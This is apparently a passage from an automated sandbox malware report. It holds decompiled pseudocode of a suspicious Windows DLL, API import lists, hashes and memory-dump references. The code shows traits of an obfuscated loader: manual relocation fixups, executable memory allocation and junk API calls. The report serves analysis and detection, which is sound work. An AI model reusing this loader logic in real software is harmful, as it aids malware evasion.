											_t1002 =  *((intOrPtr*)(_v116 + 0x28)) + _t955;
											__eflags = _v276;
											if(_v276 != 0) {
												_t555 =  *_t1002(_v244, 1, 0);
												L255:
												asm("movsd xmm0, [ebp-0x40]");
												E6E808391(_t555);
												L253:
												 *[fs:0x0] = _v16;
												__eflags = _v24 ^ _t1031;
												return E6E7E440A(_v24 ^ _t1031);
											}
											_t555 = E6E7D6360(_t955, _v272);
											_v100 = _t555;
											__eflags = _t555;
											if(_t555 == 0) {
												goto L255;
											}
											__eflags = _v248;
											if(_v248 == 0) {
												_t957 = _v244;
											} else {
												_t957 = _v244;
												E6E7D6320(_t957, _t955);
											}
											 *_t1002(_t957, 1, 0);
											_v100(_v264, _v260, _v256, _v252);
											goto L253;
										}
										_t562 = _v40;
										asm("o16 nop [eax+eax]");
										while(1) {
											L239:
											asm("movsd xmm1, [0x6e8185c8]");
											_t958 = 0;
											_t1004 = 0x5d;
											__eflags = _t562 - 2;
											if(_t562 < 2) {
												continue;
											} else {
												goto L240;
											}
											do {
												L240:
												asm("movaps xmm0, xmm1");
												asm("addsd xmm0, xmm1");
												asm("movsd [ebp-0x98], xmm0");
												_t563 = E6E7D5780(_t562, _t1004, _t958);
												_t1033 = _t1033 + 8;
												asm("cdq");
												_t1004 = _t563;
												_t958 = _t914;
												_t562 = E6E808500(_t563, _t563);
												asm("movsd xmm1, [ebp-0x98]");
												asm("divsd xmm1, xmm0");
												asm("cvttsd2si eax, xmm1");
												asm("movsd xmm1, [ebp-0x98]");
												__eflags = _t562 - 2;
											} while (_t562 >= 2);
											do {
												goto L239;
											} while (_t562 < 2);
											goto L240;
											L239:
											asm("movsd xmm1, [0x6e8185c8]");
											_t958 = 0;
											_t1004 = 0x5d;
											__eflags = _t562 - 2;
										}
									}
									__eflags = _t551 - _t810;
									if(_t551 < _t810) {
										__eflags = _v40 - 0x4d;
										if(_v40 != 0x4d) {
											E6E7D5ED0(0x30, _t914);
										} else {
											_t582 = GetDesktopWindow();
											E6E7D57C0();
											asm("movss xmm0, [0x6e8186a0]");
											E6E7D5990(_t914, E6E8081CE(_t582), _t914);
											_t1033 = _t1033 + 8;
										}
										__imp__GetUserDefaultUILanguage();
										_v40 = 0xfffffff1;
										_t567 = _v72;
									} else {
										_t567 =  *_t998 + _v80;
										_v72 = _t567;
									}
									_t821 = _t567 + 4;
									_t551 =  *_t821;
									_v28 = _t821;
									__eflags = _t551;
									if(_t551 != 0) {
										_t914 = _v76;
										do {
											__eflags = _v36 - _v52;
											_t823 = _v28;
											if(_v36 > _v52) {
												_t998 = _t551 - 8 >> 1;
												_t914 =  *_v72 + _v80;
												_t581 = _v72 + 8;
												__eflags = _t581;
												_v60 = _t581;
											}
											__eflags = _t998;
											if(_t998 != 0) {
												_t571 = _v36 + _v36;
												__eflags = _t571;
												_v100 = _t571;
												while(1) {
													_t998 = _t998 - 1;
													__eflags = _t571 - _v52;
													if(_t571 < _v52) {
														break;
													}
													_t576 =  *_v60 & 0x0000ffff;
													_t828 = _t576;
													_t577 = _t576 >> 0xc;
													__eflags = _t577 - 0xa;
													if(_t577 != 0xa) {
														__eflags = _t577 - 3;
														if(_t577 != 3) {
															__eflags = _t577 - 1;
															if(_t577 != 1) {
																__eflags = _t577 - 2;
																if(_t577 == 2) {
																	_t829 = _t828 & 0x00000fff;
																	_t436 = _t829 + _t914;
																	 *_t436 =  *(_t829 + _t914) + _t954;
																	__eflags =  *_t436;
																}
															} else {
																 *((intOrPtr*)((_t828 & 0x00000fff) + _t914)) =  *((intOrPtr*)((_t828 & 0x00000fff) + _t914)) + (_t954 >> 0x10);
															}
														} else {
															 *((intOrPtr*)((_t828 & 0x00000fff) + _t914)) =  *((intOrPtr*)((_t828 & 0x00000fff) + _t914)) + _t954;
														}
													} else {
														 *((intOrPtr*)((_t828 & 0x00000fff) + _t914)) =  *((intOrPtr*)((_t828 & 0x00000fff) + _t914)) + _t954;
													}
													_v60 = _v60 + 2;
													_t571 = _v100;
													__eflags = _t998;
													if(_t998 != 0) {
														continue;
													} else {
														_t823 = _v28;
														goto L232;
													}
												}
												_t572 = _v40;
												while(1) {
													L243:
													__eflags = _t572 - 4;
													if(_t572 >= 4) {
														break;
													}
													_t572 = 0xa4;
												}
												__eflags = _t572 - 0x2c;
												if(_t572 > 0x2c) {
													_t573 = GetEnvironmentStringsW();
													E6E7D57C0();
													_t574 = E6E808500(_t573, 0);
													asm("cvtsd2ss xmm0, xmm0");
													asm("movss [ebp-0x60], xmm0");
													_t572 = E6E808500(_t574, 0xf6);
													asm("movss xmm1, [ebp-0x60]");
													asm("cvtsd2ss xmm0, xmm0");
													asm("mulss xmm1, xmm0");
													asm("movd xmm0, esi");
													asm("cvtdq2ps xmm0, xmm0");
													asm("mulss xmm0, xmm1");
													asm("cvttss2si eax, xmm0");
												}
												goto L243;
											}
											L232:
											_t998 = _t998 - 1;
											__eflags = _v36 - _v52;
											_t569 = _v72;
											if(_v36 > _v52) {
												_t569 = _t569 +  *_t823;
												__eflags = _t569;
												_v72 = _t569;
											}
											_t824 = _t569 + 4;
											_t551 =  *_t824;
											_v28 = _t824;
											__eflags = _t551;
										} while (_t551 != 0);
									}
									goto L235;
								}
								L207:
								goto L207;
							}
							__eflags = _t910 - _v140;
							_t639 =  >  ? _t910 : _v112;
							_t923 =  >  ? _t910 : _v112;
							_v36 =  >  ? _t910 : _v112;
							__imp__GetTickCount64();
							E6E8084C0(E6E807870( >  ? _t910 : _v112,  >  ? _t910 : _v112, 0x2710, 0), _t640,  >  ? _t910 : _v112);
							asm("mulsd xmm0, [0x6e818560]");
							_t642 =  *_t946;
							_t946 = _t946 + 1;
							asm("movsd xmm1, [ebp-0x64]");
							_t910 = _v36;
							 *_t989 = _t642;
							_t989 = _t989 + 1;
							asm("mulsd xmm0, [0x6e818568]");
							_v8 = 0xffffffff;
							asm("addsd xmm1, xmm0");
							asm("movsd [ebp-0x64], xmm1");
							goto L145;
						}
						asm("cdq");
						_t644 = _t910 - _t910;
						__eflags = _t644;
						_t645 = _t644 >> 1;
						_v84 = _t645;
						while(1) {
							_v56 = _t796;
							__eflags = _t645 - _t988;
							if(_t645 >= _t988) {
								break;
							}
							_push(0);
							__eflags = _v40 - 0x5d;
							if(_v40 == 0x5d) {
								_push(0x14);
								_t647 = E6E7D5990(_t910);
								_t1033 = _t1033 + 8;
								_t910 = _t647 * _t647 + (_t647 * _t647 << 2) << 2;
								__eflags = _t910;
							} else {
								_push(0x2c);
								_t664 = E6E7D5990(_t910);
								_t665 = _t664;
								_t1033 = _t1033 + 8;
								_t217 = _t665 + 0x14; // 0x14
								asm("cdq");
								_t910 = _t664 / _t217;
							}
							_t857 = 0;
							_t650 = 0x33;
							__eflags = _t910 - 9;
							if(_t910 >= 9) {
								L133:
								__eflags = _t910 - 0x75;
								if(_t910 <= 0x75) {
									__imp__GetTickCount64();
									_t910 = 0x10;
								}
								_v41 = 0x4a;
								__eflags = _t910 - 0x6d;
								if(_t910 <= 0x6d) {
									L137:
									asm("movss xmm0, [0x6e8186d0]");
									_t651 = 0x6b;
									_v192 = 0;
									asm("movss [ebp-0x2c], xmm0");
									_t237 = _t651 - 0x35; // 0x36
									_t1016 = _t237;
									while(1) {
										_t652 = E6E7D5ED0(_t651, _t910);
										asm("movss xmm1, [ebp-0x2c]");
										_t1016 = _t1016 + _t652;
										asm("divss xmm1, xmm1");
										_v64 = _t652;
										asm("movd xmm0, esi");
										asm("cvtdq2ps xmm0, xmm0");
										asm("movss [ebp-0x2c], xmm1");
										asm("divss xmm1, xmm0");
										asm("movss [ebp-0x5c], xmm1");
										_t653 = E6E808500(_t652, _t652);
										asm("movss xmm1, [ebp-0x5c]");
										asm("cvtsd2ss xmm0, xmm0");
										asm("addss xmm1, xmm0");
										asm("cvttss2si eax, xmm1");
										_v40 = _t653;
										_v29 = _t653;
										__eflags = _t653 - 0x2e;
										if(_t653 < 0x2e) {
											break;
										}
										_t651 = _v64;
									}
									asm("movss xmm0, [0x6e8186a4]");
									_t860 = 0x4e;
									asm("movss [ebp-0x2c], xmm0");
									__eflags = _t653 - 0x3b;
									if(_t653 >= 0x3b) {
										L142:
										_t796 = _v28 + 1;
										__eflags = _v56 - _v112;
										_t645 = _v84;
										_t988 = _v52;
										_v28 = _t796;
										if(_v56 >= _v112) {
											continue;
										}
										_t910 = _v36;
										goto L144;
									} else {
										goto L141;
									}
									do {
										L141:
										asm("cdq");
										_t656 = E6E7D5990(_t910, _t860, _t910);
										asm("cvttss2si ecx, [ebp-0x2c]");
										_t1033 = _t1033 + 8;
										_v85 = _t656;
										E6E808500(E6E7D5ED0(_t860, _t910), _t657);
										_t860 = _v85;
										asm("xorps xmm1, xmm1");
										_t659 = _v85;
										asm("cvtsd2ss xmm1, xmm0");
										asm("movd xmm0, eax");
										asm("cvtdq2ps xmm0, xmm0");
										asm("movaps xmm2, xmm0");
										asm("addss xmm0, xmm1");
										asm("mulss xmm2, xmm1");
										asm("subss xmm0, xmm2");
										asm("movss [ebp-0x2c], xmm2");
										asm("cvttss2si eax, xmm0");
										_v40 = _t659;
										_v29 = _t659;
										__eflags = _t659 - 0x3b;
									} while (_t659 < 0x3b);
									goto L142;
								} else {
									do {
										GetACP();
										_t662 = _v41 + _v41;
										_v41 = _t662;
										__eflags = _t662 - 0x6d;
									} while (_t662 > 0x6d);
									goto L137;
								}
							} else {
								do {
									_t663 = E6E7D5990(_t910, _t650, _t857);
									_t650 = _t663;
									_t1033 = _t1033 + 8;
									asm("cdq");
									_t857 = _t910;
									_t910 = _t663;
									__eflags = _t910 - 9;
								} while (_t910 < 9);
								goto L133;
							}
						}
						_t646 = _v92;
						_t946 = _t646;
						_t989 = _v80;
						_t910 = _v36;
						_t854 =  *((intOrPtr*)(_t646 + 0x3c)) + _t646;
						_v116 = _t854;
						_t797 =  *(_t854 + 0x54);
						goto L146;
					}
					L279:
					_t984 = __imp__GetTickCount64;
					_t792 = _t791 - 1;
					_v92 = _t792;
					_v164 = _t792;
				}
			}

APIs

__aulldiv.LIBCMT ref: 6E7D64A2
__aullrem.LIBCMT ref: 6E7D64D4
GetTickCount64.KERNEL32 ref: 6E7D6560
GetTickCount64.KERNEL32 ref: 6E7D6562
GetTickCount64.KERNEL32 ref: 6E7D6573
GetTickCount64.KERNEL32 ref: 6E7D6579
__aulldiv.LIBCMT ref: 6E7D658E
__aulldiv.LIBCMT ref: 6E7D65B4
GetThreadLocale.KERNEL32(?,?,00002710,00000000), ref: 6E7D66D5
GetEnvironmentStringsW.KERNEL32(00000050,00000000,00000050,00000000,?,?,00002710,00000000), ref: 6E7D66F3
GetCommandLineA.KERNEL32(?,?,?,?,00002710,00000000), ref: 6E7D6713
IsWow64Message.USER32 ref: 6E7D6793
GetSystemDefaultLangID.KERNEL32(?,?,?,?,?,?,?,?,00002710,00000000), ref: 6E7D67C3
InSendMessage.USER32 ref: 6E7D67FB
GetShellWindow.USER32 ref: 6E7D688C
GetCapture.USER32 ref: 6E7D69F0
AreFileApisANSI.KERNEL32(?,?,?,?,?,?,?,?,00002710,00000000), ref: 6E7D6AE2
GetCapture.USER32 ref: 6E7D6B86
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E7D6BBB
GetThreadLocale.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00002710,00000000), ref: 6E7D6BCC
InSendMessage.USER32 ref: 6E7D6BD6
GetCurrentThreadId.KERNEL32 ref: 6E7D6C07
GetDialogBaseUnits.USER32 ref: 6E7D6C7D
GetOEMCP.KERNEL32(?,?,?,?,?,?,00002710,00000000), ref: 6E7D6C90
GetForegroundWindow.USER32(?,?,?,?,?,?,00002710,00000000), ref: 6E7D6CD3
GetACP.KERNEL32(?,?,?,?,?,?,00002710,00000000), ref: 6E7D6D10
GetCurrentThreadId.KERNEL32 ref: 6E7D6D18
UnregisterApplicationRecoveryCallback.KERNEL32 ref: 6E7D6D20
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00002710,00000000), ref: 6E7D6D26
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,?,00002710,00000000), ref: 6E7D6D90
GetTickCount64.KERNEL32 ref: 6E7D6DC0
__aulldiv.LIBCMT ref: 6E7D6DEE
GetTickCount64.KERNEL32 ref: 6E7D70B2
GetACP.KERNEL32(00000000,?,00002710,00000000), ref: 6E7D70C3

Strings

J, xrefs: 6E7D70BA
6, xrefs: 6E7D6C83
h, xrefs: 6E7D670F

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Count64Tick$Thread__aulldiv$Message$CaptureCurrentEnvironmentLocaleSendStringsWindow$AllocApisApplicationBaseCallbackCommandDefaultDialogFileForegroundLangLineRecoveryShellSystemUnitsUnothrow_t@std@@@UnregisterVirtualWow64__aullrem__ehfuncinfo$??2@
String ID: 6$J$h
API String ID: 1854928522-144671368
Opcode ID: 1f322b279c40dcb39832d6a264dafd9b20d1aeef6954e6afdd9ec3e365dfaa45
Instruction ID: b52f0b2f2e017d4820c7cdbf3591d23e6e64cea1f1a3115f829b1271add3d6ae
Opcode Fuzzy Hash: 1f322b279c40dcb39832d6a264dafd9b20d1aeef6954e6afdd9ec3e365dfaa45
Instruction Fuzzy Hash: 34F2C171D10A19CFCB11CFF8C9417DEB7BAAF4A354F14866AE409BB251EB305986CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E36B0, Relevance: 12.2, APIs: 8, Instructions: 159COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6E7E3767
GetTickCount64.KERNEL32 ref: 6E7E3769
GetTickCount64.KERNEL32 ref: 6E7E3770
GetTickCount64.KERNEL32 ref: 6E7E3790
GetTickCount64.KERNEL32 ref: 6E7E37A9
GetTickCount64.KERNEL32 ref: 6E7E37AB
GetTickCount64.KERNEL32 ref: 6E7E37B2
GetTickCount64.KERNEL32 ref: 6E7E37D0

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Count64Tick
String ID:
API String ID: 1927824332-0
Opcode ID: e9301473c7491539bb5fe356feb2a2068f76eb795ca6d95d207010cd434122b0
Instruction ID: f92ec31554fee9e5d3aacc7821a3047a3dbf46c2af8d5878807f65e47a1507c6
Opcode Fuzzy Hash: e9301473c7491539bb5fe356feb2a2068f76eb795ca6d95d207010cd434122b0
Instruction Fuzzy Hash: EE511431D10A11DFEB11DFB8C645799B3B4BF5A354F00872AD85AB7A61EB70A881CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F9AB2, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(000000FF,6E7F6065,?,6E7F5AFD,6E7F928E,6E7F6065,?,6E7F69EA,000000FF,000000FF), ref: 6E7F9AB7
SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6E7F69EA,000000FF,000000FF), ref: 6E7F9ADD
_free.LIBCMT ref: 6E7F9B1D
_free.LIBCMT ref: 6E7F9B50
SetLastError.KERNEL32(00000000,000000FF), ref: 6E7F9B5D

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0bdfb57775eb26aa4d463ce164dd0e582f0fd0f9bb4149fdc85fcdf1ae3581e8
Instruction ID: 1ebb9c447dab9dc37c95d112dfb6d37427c0d8ddcd1b70c1a9190abbbd72f567
Opcode Fuzzy Hash: 0bdfb57775eb26aa4d463ce164dd0e582f0fd0f9bb4149fdc85fcdf1ae3581e8
Instruction Fuzzy Hash: 8211C872114902EA8B02EEF94E48E9B356DEFD23797140B35F52C927B0DF21C907DAA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F64B0, Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 6E7FD3D6: GetEnvironmentStringsW.KERNEL32 ref: 6E7FD3DF
Part of subcall function 6E7FD3D6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E7FD402
Part of subcall function 6E7FD3D6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6E7FD428
Part of subcall function 6E7FD3D6: _free.LIBCMT ref: 6E7FD43B
Part of subcall function 6E7FD3D6: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E7FD44A

_free.LIBCMT ref: 6E7F64F6
_free.LIBCMT ref: 6E7F64FD

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 400815659-0
Opcode ID: d1907afabd0ca1fd4bea19a8282fcbae0cee0c286e084a07287bf159315043ce
Instruction ID: 67e3155056b74e00be4b0c872075262a369d26557ae182350e6b6598525f374b
Opcode Fuzzy Hash: d1907afabd0ca1fd4bea19a8282fcbae0cee0c286e084a07287bf159315043ce
Instruction Fuzzy Hash: 12E0A713A5D912C595657AE96B14ADF160C0F92338B600B25D5309B3E2DF6086074595

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E5E65, Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E7E5E6C
std::locale::_Init.LIBCPMT ref: 6E7E5E8D

Part of subcall function 6E7E5693: __EH_prolog3.LIBCMT ref: 6E7E569A
Part of subcall function 6E7E5693: std::_Lockit::_Lockit.LIBCPMT ref: 6E7E56A5
Part of subcall function 6E7E5693: std::locale::_Setgloballocale.LIBCPMT ref: 6E7E56C0
Part of subcall function 6E7E5693: _Yarn.LIBCPMT ref: 6E7E56D6
Part of subcall function 6E7E5693: std::_Lockit::~_Lockit.LIBCPMT ref: 6E7E5716

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: 72878c3a039b1564652ddaa0ec6ed227fa841369257e671bda39916f371f39d9
Instruction ID: 79d97d167cce43a1ff824d38765b16552938d9147fc2b587d6436c64c57012be
Opcode Fuzzy Hash: 72878c3a039b1564652ddaa0ec6ed227fa841369257e671bda39916f371f39d9
Instruction Fuzzy Hash: EAE02672B017129FD7151BECAA0139C63946F41B14F500C5AD110AFAE0CFB549004BC4

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F690C, Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E7F69E5

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e7b5c5dc7497639af5ef342284b03cc322aae03caad8569656ccf537422481cf
Instruction ID: 494ebae15b33d50de8851780476e2599c384fb529a45b5a0fa9e28242792386d
Opcode Fuzzy Hash: e7b5c5dc7497639af5ef342284b03cc322aae03caad8569656ccf537422481cf
Instruction Fuzzy Hash: AF414A72A10615CF9B14CFADC58459DB7F1FF89320B1582A9D918AB7A0D730AD42CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E8059BB, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 6E7FC3A0: RtlAllocateHeap.NTDLL(00000008,000000FF,00000000,?,6E7F9B08,00000001,00000364,FFFFFFFF,000000FF,?,6E7F69EA,000000FF,000000FF), ref: 6E7FC3E1

_free.LIBCMT ref: 6E805A27

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 3d4646df36797a1a579ec44f7385dd0d413326af4cf721c733378c8cf8399de6
Instruction ID: 9750fa6a94141818417f9db3c624584b12bf3181c1ec04dd646729f8feda3786
Opcode Fuzzy Hash: 3d4646df36797a1a579ec44f7385dd0d413326af4cf721c733378c8cf8399de6
Instruction Fuzzy Hash: ED01DB721543059BE331CF99DC8599AFBEDEB85370F650A1DD594872C0EB306906C674

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FC3A0, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,000000FF,00000000,?,6E7F9B08,00000001,00000364,FFFFFFFF,000000FF,?,6E7F69EA,000000FF,000000FF), ref: 6E7FC3E1

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 52725bcf5822864e661017ac2ac8ab53608b8bf79d71faf0ecdda249acd6299f
Instruction ID: 8e2a34a113ea11b5d3666e882bdf67610f4c8e5422f1059f963a9c886b014a56
Opcode Fuzzy Hash: 52725bcf5822864e661017ac2ac8ab53608b8bf79d71faf0ecdda249acd6299f
Instruction Fuzzy Hash: 7DF02B31140625DBEB50CAEACB54A4A375C9F416E2B008421AC28EF3B4CF70D80787D7

Uniqueness

Uniqueness Score: -1.00%

Function 6E800ECF, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 6E7F92A2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E7E865C,00000105,000000FF,24448D6E,00000000,?,6E7D14D7,?,00000103,000000FF), ref: 6E7F92D4

_free.LIBCMT ref: 6E800EEF

Part of subcall function 6E7F9268: HeapFree.KERNEL32(00000000,00000000,?,6E7F69EA,000000FF,000000FF), ref: 6E7F927E
Part of subcall function 6E7F9268: GetLastError.KERNEL32(6E7F6065,?,6E7F69EA,000000FF,000000FF), ref: 6E7F9290

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: f8c1dcdc35c660d8c2d6edd0950d42b7efecab5c39063d250b4d16ea6a904419
Instruction ID: 7339234d922ccdf94e84a6b6b15482adfbc594ade5aaeaa871404834b16d74ff
Opcode Fuzzy Hash: f8c1dcdc35c660d8c2d6edd0950d42b7efecab5c39063d250b4d16ea6a904419
Instruction Fuzzy Hash: 9DF06DB2005704CFE7248F81D985B92B7FCEB04725F10882EE29A8BA91DB74A844CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F92A2, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E7E865C,00000105,000000FF,24448D6E,00000000,?,6E7D14D7,?,00000103,000000FF), ref: 6E7F92D4

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5cef4599dd84b2695961e9269515a5eb330feb8565888de50e8d7fcc1c406160
Instruction ID: c87826e97ddf3103ca7691c4805de1b3aca3f694d6fb097a0214972802011796
Opcode Fuzzy Hash: 5cef4599dd84b2695961e9269515a5eb330feb8565888de50e8d7fcc1c406160
Instruction Fuzzy Hash: 50E03031244522DBE6512EEA9F58B8A7A4C9F627B0B014531AC19A63B4DB64D803CAE9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E7DED30, Relevance: 37.2, APIs: 18, Strings: 3, Instructions: 404
stringmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 51%

			E6E7DED30(void* __ebx, WCHAR** __ecx, void* __edi, void* __esi, WCHAR* _a4, intOrPtr* _a8) {
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v84;
				signed int _v88;
				signed int _v92;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr* _v112;
				intOrPtr _v132;
				signed int _v144;
				short _v8204;
				short _v8208;
				short _v8212;
				char _v8340;
				void* __ebp;
				signed int _t90;
				signed int _t91;
				intOrPtr* _t93;
				short _t96;
				signed int _t98;
				signed int _t99;
				intOrPtr _t101;
				WCHAR* _t104;
				intOrPtr _t107;
				signed int _t117;
				void* _t120;
				short _t122;
				void* _t125;
				void* _t129;
				void* _t132;
				void* _t133;
				void* _t139;
				WCHAR* _t146;
				WCHAR* _t147;
				void* _t155;
				WCHAR* _t156;
				WCHAR* _t157;
				WCHAR* _t158;
				void* _t165;
				WCHAR* _t168;
				WCHAR* _t169;
				intOrPtr _t171;
				WCHAR* _t177;
				char _t183;
				signed int _t190;
				WCHAR* _t191;
				WCHAR* _t199;
				signed short* _t201;
				WCHAR* _t208;
				short* _t211;
				signed int _t215;
				intOrPtr _t217;
				intOrPtr _t218;
				WCHAR** _t220;
				signed int _t223;
				intOrPtr _t224;
				WCHAR* _t226;
				signed int _t228;
				void* _t231;
				signed int _t234;
				void* _t236;
				signed int _t237;
				signed int _t242;
				void* _t258;

				_push(0xffffffff);
				_push(E6E8092A8);
				_push( *[fs:0x0]);
				_t237 = _t236 - 0x60;
				_t90 =  *0x6e81e008; // 0x77dcee0d
				_t91 = _t90 ^ _t234;
				_v20 = _t91;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t91);
				 *[fs:0x0] =  &_v16;
				_t220 = __ecx;
				_t226 = _a4;
				_t93 = _a8;
				_v112 = _t93;
				if(_t226 == 0 || _t93 == 0) {
					goto L57;
				} else {
					_t177 = _t226;
					 *_t93 = 0;
					_t6 =  &(_t177[1]); // 0x2
					_t211 = _t6;
					do {
						_t96 =  *_t177;
						_t177 =  &(_t177[1]);
					} while (_t96 != 0);
					_v88 = 0;
					asm("xorps xmm0, xmm0");
					asm("movq [ebp-0x5c], xmm0");
					_v96 = 0;
					_t98 =  <  ? 0x3e8 : (_t177 - _t211 >> 1) + (_t177 - _t211 >> 1);
